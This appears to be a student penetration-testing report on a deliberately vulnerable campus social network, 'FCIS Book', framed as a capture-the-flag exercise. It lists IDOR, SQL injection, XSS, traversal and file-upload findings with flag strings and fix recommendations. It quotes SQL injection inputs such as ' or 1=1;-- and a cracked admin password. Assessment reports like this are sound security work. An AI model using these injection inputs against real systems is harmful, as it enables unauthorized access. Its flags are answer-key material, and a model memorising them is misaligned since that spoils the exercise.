Penetration Testing Report

Table of Contents

1 Executive Summary...........................................................................................................3
2 Assessment Overview........................................................................................................5
2.1 Planning.........................................................................................................................6
2.2 Discovery.......................................................................................................................6
2.3 Attack.............................................................................................................................6
2.4 Reporting.......................................................................................................................6
3 Finding Severity Ratings....................................................................................................7
4 Scope of Engagement........................................................................................................8
4.1 Targets...........................................................................................................................8
4.2 Scope Exclusions.........................................................................................................8
5 Findings Table.....................................................................................................................9
6 Technical Findings............................................................................................................10

Penetration Testing Report

1 Executive Summary

In the heart of Ain Shams University's bustling campus, a group of

computer science students were buzzing with excitement. Inspired by
the tale of Mark Zuckerberg, they Start their mission to create their
own social networking platform, "FCIS Book" exclusively for their fellow
FCIS peers.
FCIS Book was designed to be a digital hub where students could
connect, share updates, and engage with each other. It offered a
variety of features,
including:
 User profiles: Students could create personal profiles to showcase
their interests, hobbies, and academic achievements.
 Comment sections: Users could leave comments on posts,
sparking discussions and fostering a sense of community.
 Search functionality: A search bar allowed users to easily find
friends
 Profile picture uploads: Students could personalize their profiles
by uploading their own profile pictures.

As FCIS Book grew in popularity, whispers of hidden vulnerabilities

began to circulate among the student body. Tales of flags tucked away
in unexpected corners and opportunities for unauthorized access
piqued the curiosity of a group of tech-savvy individuals, the self-
proclaimed "FCIS Vuln Hunters."
Driven by a passion for cybersecurity, the Vuln Hunters embarked on a
quest to uncover the secrets of FCIS Book. They carefully analyzed the
website's code, scrutinized its functionalities, and delved into the
depths of its user interactions.
Their investigations led them to discover hints of potential
vulnerabilities,
subtle clues that suggested hidden flaws within the platform's security.
These observations fuelled their determination to uncover the truth.

Penetration Testing Report

The Vuln Hunters' persistence paid off. They discovered vulnerabilities
that allowed them to manipulate user profiles, inject malicious code,
and even gain unauthorized access to sensitive information. These
discoveries highlighted the importance of robust security measures,
user input validation, and access control mechanisms.
The FCIS Book development team left a trail of breadcrumbs for the
Vuln Hunters to follow. Amidst their coding, they stored comments and
reminders in an unencrypted file named "secret.txt". This file became a
roadmap for the Vuln Hunters, revealing a cryptic message that
signaled the presence of a hidden vulnerability. The Vuln Hunters were
poised to uncover the platform's deepest secrets, armed with this
newfound knowledge.
The FCIS Book development team's overreliance on the GET method
for home page interactions proved to be their undoing. The Vuln
Hunters, armed with their knowledge of various HTTP methods and
web proxies, exploited the home page's weaknesses, uncovering
hidden vulnerabilities and potential entry points for
unauthorized access.
The FCIS Book Vuln Hunters' relentless pursuit led them to the super
user's password, a coveted credential that unlocked the platform's
core functionalities. Empowered with this newfound power, they could
delve deeper into the system, uncovering hidden secrets and potential
vulnerabilities. Their journey had transformed them from mere
students into cybersecurity enthusiasts, ready to safeguard their
digital realm
Unfazed by the "super" user's claims of invincibility, the FCIS Book Vuln
Hunters embarked on a mission to crack his password, a challenge that
would test their skills. Through persistent effort, they finally gained
access to the account, only to discover a password far from "super" in
strength. This discovery served as a humbling reminder to the "super"
user and highlighted the importance of staying vigilant and
implementing robust security measures.
The FCIS Book Vuln Hunters' final challenge was to breach another
user's password, a feat that demanded both skill and perseverance.
Through relentless attacks and cryptographic expertise, they cracked
the code, gaining access to another user's account.

Penetration Testing Report

As the Vuln Hunters shared their findings with the FCIS Book
development team, they hoped that their insights would contribute to
the platform's overall security and strengthen the trust of its users.
Their journey through the vulnerabilities of FCIS Book served as a
testament to their curiosity, ingenuity, and unwavering determination
to protect their digital realm.
This report presents the output of an internal penetration test that was
conducted against FCIS book. It is recommended to fix the found
vulnerabilities.
The assessment showed:
Seven Easy vulnerabilities.
In addition to, FIVE Medium vulnerabilities
And FIVE Bonus vulnerabilities

2 Assessment Overview

From Dec 2nd, 2023 to Dec 17th, 2023, FCIS book engaged You to evaluate
the security posture of its infrastructure compared to current industry best
practices that included an external penetration test. All testing performed is
based on the NIST SP 800-115 Technical Guide to Information Security
Testing and Assessment, OWASP Testing Guide (v4), and customized testing
frameworks.
Phases of penetration testing activities include the following:
 Planning – Customer goals are gathered and rules of engagement
obtained.
 Discovery – Perform scanning and enumeration to identify potential
vulnerabilities, weak areas, and exploits.
 Attack – Confirm potential vulnerabilities through exploitation and
perform additional discovery upon new access.
 Reporting – Document all found vulnerabilities and exploits, failed
attempts, and company strengths and weaknesses.

Penetration Testing Report

Penetration Testing Report
2.1 Planning
Planning in penetration testing involves collaboratively defining the scope,
goals, and guidelines for the test. This phase establishes the boundaries of
the assessment, such as which systems are included and the desired
objectives—whether it's uncovering vulnerabilities, testing response
procedures, or assessing controls. Ethical and legal considerations are
addressed, resources are allocated, and a communication plan is set for a
successful testing engagement. This strategic groundwork ensures alignment
between the testing team and the client, leading to a well-structured and
effective penetration test.

2.2 Discovery
 Information Gathering: Collect relevant information about the internal
infrastructure, including IP ranges, domain names, and network
architecture.
 Open Source Intelligence (OSINT): Utilize publicly available sources to
gather additional information about employees, technology stack, and
potential weak points.
 Vulnerability Scanning: Perform automated vulnerability scans on the
identified systems to uncover known security vulnerabilities.
 Network Mapping: Create a comprehensive map of the internal
network, identifying live hosts, open ports, and services.

2.3 Attack
 Manual Vulnerability Assessment: Conduct an in-depth manual
assessment of the identified vulnerabilities to validate their severity
and potential impact.
 Exploitation: Attempt to exploit the identified vulnerabilities to
determine their feasibility and potential impact on the internal
systems.
 Privilege Escalation: If necessary, attempt to escalate privileges to gain
deeper access into the systems and network.
 Lateral Movement: Explore the internal network for lateral movement
opportunities, simulating an attacker's attempt to pivot within the
environment.
 Data Exfiltration (If Agreed Upon): Simulate the extraction of sensitive
data from the internal systems to demonstrate potential data
breaches.

2.4 Reporting
Reporting the findings of the penetration tests is integral to the fulfilment of
the previously mentioned strategic motivations and driving forces behind
engaging in such a process. Hence, once the above tasks are completed, a

Penetration Testing Report

documentation scheme is followed to report the results across different
levels including technical and management levels. The report is going to be
focused on the real risk behind the findings to maximize business value.
Also, whenever applicable, a detailed recommendation is included on how to
fix the leveraged vulnerabilities and / or minimize their threat.

Penetration Testing Report

3 Finding Severity Ratings

The following table defines levels of severity and corresponding CVSS score
range that are used throughout the document to assess vulnerability and risk
impact.
CVSS V3
Severity Definiti
Score
on
Range
Exploitation is straightforward and usually results in
Critical 9.0-10.0 system-level compromise. It is advised to form a plan of
action and patch immediately.

Exploitation is more difficult but could cause elevated

High 7.0-8.9 privileges and potentially a loss of data or downtime. It is
advised to form a plan of action and patch as soon as
possible.
Vulnerabilities exist but are not exploitable or require
Moderate 4.0-6.9 extra steps such as social engineering. It is advised to
form a plan of action and patch after high-priority issues
have been resolved.
Vulnerabilities are non-exploitable but would reduce an
Low 0.1-3.9 organization’s attack surface. It is advised to form a plan
of action and patch during the next maintenance window.

No vulnerability exists. Additional information is provided

Informatio N/A regarding items noticed during testing, strong controls, and
additional documentation.
nal

Risk Factors
Risk is measured by two factors: Likelihood and Impact:

Likelihood
Likelihood measures the potential of a vulnerability being exploited. Ratings are
given based on the difficulty of the attack, the available tools, attacker skill level,
and client environment.

Impact
Impact measures the potential vulnerability’s effect on operations, including
confidentiality, integrity, and availability of client systems and/or data,
reputational harm, and financial loss.

Penetration Testing Report

Penetration Testing Report
4 Scope of Engagement
The scope of this engagement includes performing Internal Penetration
Testing for
FCIS book.

4.1 Targets
Assessm Detai
ent ls

Internal Penetration Test Local host

4.2 Scope Exclusions

Per client request, you will not perform any of the following attacks during
testing:
• Denial of Service (DoS)
• Phishing/Social Engineering

All other attacks not specified above were permitted by FCIS book.

Penetration Testing Report

5 Findings Table

Risk Finding

High Remote Code Execution on

Mediu Outdated Software version at

m

Low Server Header information at

Penetration Testing Report

 6 Technical Findings
6.1 Login page source code

FLAG{lYQcDZ2c2IVNdk7Uf0pycjS5sE6IaNzGgkxnlOYoyl1XvoqYove+6
RcFFNr0R5L+U/URtL+YokeXnUyfC+vAMiItlPOcIhZCtHaDYLFiMQA=}

Description:

A flag can be obtained when we check the src code of the login
page
Recommend
ations

• Not putting important data in the html of the page

Affected 192.168.1.23
Systems
Threat Level N/A

Steps to reproduce: -
1- The below screenshot shows how an attacker can get the flag.

Penetration Testing Report

6.2 OPTIONS Method allowed in home page
Description:

Using burp suit we can run options instead of get

request to get all available options for the home page
and get a flag
Recommendati
ons

• Only allowing needed methods (Get for this

example)
Affected 192.168.1.23
Systems
Threat Level Low
FLAG{ewdso8Cbhxidy9Iw7ZpcEBGnSryT5qe4pwHo5GMu7lEqZmakm
Z8UnH+pvHWW+TiXIHaLBH9R+FTFo/
VviftFlNCX03Uu9YpKm1oQ3qE4GyM=}

Steps to reproduce: -
1- The below screenshot show how an attacker can get the flag.

Penetration Testing Report

 2-

Penetration Testing Report

6.3 Head method allowed for Home page
Description:

Using burp suit we can run options instead of get

request to get all available options for the home page
and get a flag
Recommendati
ons

• Only allowing needed methods (Get for this

example)
Affected 192.168.1.23
Systems
Threat Level Low
FLAG{ZsCRgDoljh+tALqnvvjYmybWGwWEjAxwb+pUivOmX/
VaAbo5EyDYAnveQ9vaZGSdbXmXIXk0+79dqEck9rA+Z7RbiyGAB1gv
E3/HXhgbtjw=}

Steps to reproduce: -

Penetration Testing Report

6.4 Access Control (Horizontal IDOR)
Description:

By changing user id in profile page, we were able to

gain unauthorized access to different users’ account
details
Recommendati
ons

• Removing the user’s ability to change the ip/

access other users’ accounts
Affected 192.168.1.23
Systems
Threat Level Moderate
FLAG{Xb8uM97We3o6tMrUgl1RQ9YU0qmX1SH6wW1PwFHnPcQrwlR
fcg76I6KoGAf7o90KyxdfSxCYXMUq9kOkln80bHjQSGdeKRFzw2TFizyr
IVE=}
Steps to reproduce:

Penetration Testing Report

 1-

Penetration Testing Report

 2-

6.5 Access Control (Vertical IDOR)

Description:

By changing user id in profile page to 1 and changing

role through cookies, we were able to gain
unauthorized access to admin’s account details

Penetration Testing Report

Recommendati
ons
• Removing the user’s ability to change the ip/
access other users’ accounts
• Not authorizing for an admin user through cookies
Affected 192.168.1.23
Systems
Threat Level HIGH
FLAG{zKCw7A1+LEZZAtpnJQc5zCgSJXYd9DgKx3PAHsDtLerbgJVtpcA
HqRVQvZ5HSHDb87p4ihLSoOnime1TQLaICTDkSIMHouggOQ3TPafNid
4=}Steps to reproduce:
1-

2-

Penetration Testing Report

 3-

Penetration Testing Report

6.6 In-Band SQL-Injection (Error based)
Description:

Search using (‘) resulted in a SQL syntax error letting

us know what users table is called. Then using (‘ or
1=1;--) to get all users
Recommendati
ons
• Not Displaying SQL errors in the frontend to end-
users
• Validating the input from search bar
Affected 192.168.1.23
Systems
Threat Level HIGH
FLAG{h0VsPrWePG0aJQMnn4XLc1hS8hVxxKs7c5vhiVuP4AakCecGUB
pblmEd+jIsheaz2O2eWFNs+FXH9K/
4MDHUP5grLZOroeHRexw9XjhlTtY=}
Steps to reproduce:

1-

2-

3-

Penetration Testing Report

 4-

6.7 In-Band SQL-Injection (Union Based SQL-i)

Description:

I was able to extract all table names AKA. Database

information using a sql injection union command
Recommendati
ons
• Not Displaying sql errors in the frontend to end-
users
• Validating the input from search bar

Penetration Testing Report

Affected 192.168.1.23
Systems
Threat Level HIGH
FLAG{MiqzbRG3DSTUsGHyAXGfp1Mo6cML+P5VmqjAegyN7reh8gTLC
an7RVf0gQBFKc5+bw56xamuwCvXdoobh6CXkhGpaOHZ1hHXvi8tF2Y
N3gM=}
Steps to reproduce:
1-

6.8 Admin’s password extracted and unHashed

Description:

I was able to extract admin password and unhashing it

using a SQL injection union command

Penetration Testing Report

Recommendati
ons
• Not Displaying SQL errors in the frontend to end-
users
• Validating the input from search bar
Affected 192.168.1.23
Systems
Threat Level CRITICAL
FLAG{umO/g4/n55I1mUIP7UVLc4pu3tRAhSGIQZT1Ywe0TPAGc1/
ebIqQcuZyy7D+1tSH6xLMgoyJ907kMTlP58/4vb4+Qbm9HX7nOJIGF0R
IVXQ=}
Steps to reproduce:
1-

2- B
y unhashing we get the admin password (adminadminadmin)

Penetration Testing Report

6.9 Broken Access Control
Description:
APIs and routes were easily detected using dirb
enumeration tool
Robots.txt was found and flag extracted from
Recommendati
ons

• Properly securing the APIs and not allowing any

third party application to scan or request APIs
Affected 192.168.1.23
Systems
Threat Level HIGH
FLAG{syJfbEh+W2gdOtENtz67nCvp5bGbkPGi2W64Sum2wEoXP6UUe
Ddjk29soItimg9cwJyibgU9ZAdGQtFHQcVLMB9heLK6MPz0SmoXquRL
WUs=}
Steps to reproduce:
1-

Penetration Testing Report

 2-

6.10 Broken Super user’s password using brute force

Description:

After brute forcing some common passwords on a

super user’s account we gained access.

Penetration Testing Report

Recommendati
ons
• Blocking or terminating session after several failed
trials
• Forcing users to choose complex passwords
Affected 192.168.1.23
Systems
FLAG{uRGaBAtqUKSJNeT6AHPoMa49fbobxIyhM+OYtG2APWcowjr2ZICj
637s3QdseHmZHM1sMKGy6f/r66ITeDjP3QPtcDmDQXyRQsKFX7x/
1Gc=}
Steps to reproduce:
1-

Penetration Testing Report

 2-

3-

Penetration Testing Report

 4-

6.11 XSS Attack in Search bar

Description:

Attackers might be able to exploit an XSS Attack using

the search bar in home page
Recommendati
ons

• Validating input in Search bar before executing it

and only whitelisting characters
Affected 192.168.1.23
Systems
Threat Level Moderate

Penetration Testing Report

FLAG{cpfr6UKfcY459SI3RqfuFvduFHfm6+tipacQaNFDDbH4eoiz9pOg
pMC3fn/Yzv1r1enNWtn79ClJNdPsAQjd+A==}
Steps to reproduce:

1-

2-

6.12 XSS Attack in Comment Section

Description:

Attackers might be able to exploit an XSS Attack on all

users visiting a certain post by commenting a script
Recommendati
ons

• Validating input in Comment section before

accepting and posting a comment
Affected 192.168.1.23
Systems

Penetration Testing Report

Threat Level CRITICAL
FLAG{Qd65/+P9erCOfMPeC/
br20wUuAfQMYoPoyGPqDIHXL2UZ28MC+2VWIHe4bqoufFyB6It2NvL
GuFjqnh+/+F+gg==}
Steps to reproduce:
1-

Penetration Testing Report

 2- This is what happens when any user tries to comment in the
same post exploited!

6.13 Directory or file traversal (Secret.txt)

Description:

Attackers are able to access a file that they are not

supposed to find or access
Recommendati
ons

• Not putting any directory or file structure in the

request header or body

Penetration Testing Report

Affected 192.168.1.23
Systems
Threat Level CRITICAL
FLAG{eqN4N5iTuW07SGnNkkBt+JkNjZvZQu6K0GQGgxIBKptWxrM7G
7WvroJLM88MzOU4NmEstlzxFUMV5Zbtspo0RA==}
Steps to reproduce:
1-

Penetration Testing Report

 2-

3-

Penetration Testing Report

6.14 File Upload Exploit

Description:
1.1 Attackers are able to add cmd.php file as a
profile pic

• Restrict File Types: Only allow specific file

Recommendati extensions
ons
• Inspect File Content
• Enforce Size Limits
Affected 192.168.1.23
Systems
Threat Level CRITICAL
Steps to reproduce:

Penetration Testing Report

6.15 In-Band SQL Injection (Error Based)

Description:

using (‘ or 1=1;--) in username and password

Recommendati
ons
• Not Displaying SQL errors in the frontend to
end-users
• Validating the input from search bar
Affected 192.168.1.23
Systems
Threat Level HIGH
Steps to reproduce:

Penetration Testing Report

6.16 GET Method in Login Page

Description:

Using burp suit we can run get request to get a flag

Recommendati
ons

• Only allowing needed methods

Affected 192.168.1.23
Systems
Threat Level Low

Steps to reproduce:

Penetration Testing Report

6.17 In-Band SQL Injection (Union Based)
Description:

We were able to extract all column names in users table

Recommendati
ons

• Not Displaying SQL errors in the frontend to end-users

• Validating the input from search bar
Affected 192.168.1.23
Systems
Threat Level HIGH

Steps to reproduce:

Penetration Testing Report

6.18 XSS Attack (Image Based)
Description:

Attackers might be able to exploit an XSS Attack using

the comment section in a post where users get
triggered after clicking on a comment
Recommendati
ons

• Validating input in comment bar before executing

it and only whitelisting characters
Affected 192.168.1.23
Systems
Threat Level CRITICAL

Steps to reproduce:

Penetration Testing Report

1-

2-

Penetration Testing Report

Penetration Testing Report
 Last Page

Penetration Testing Report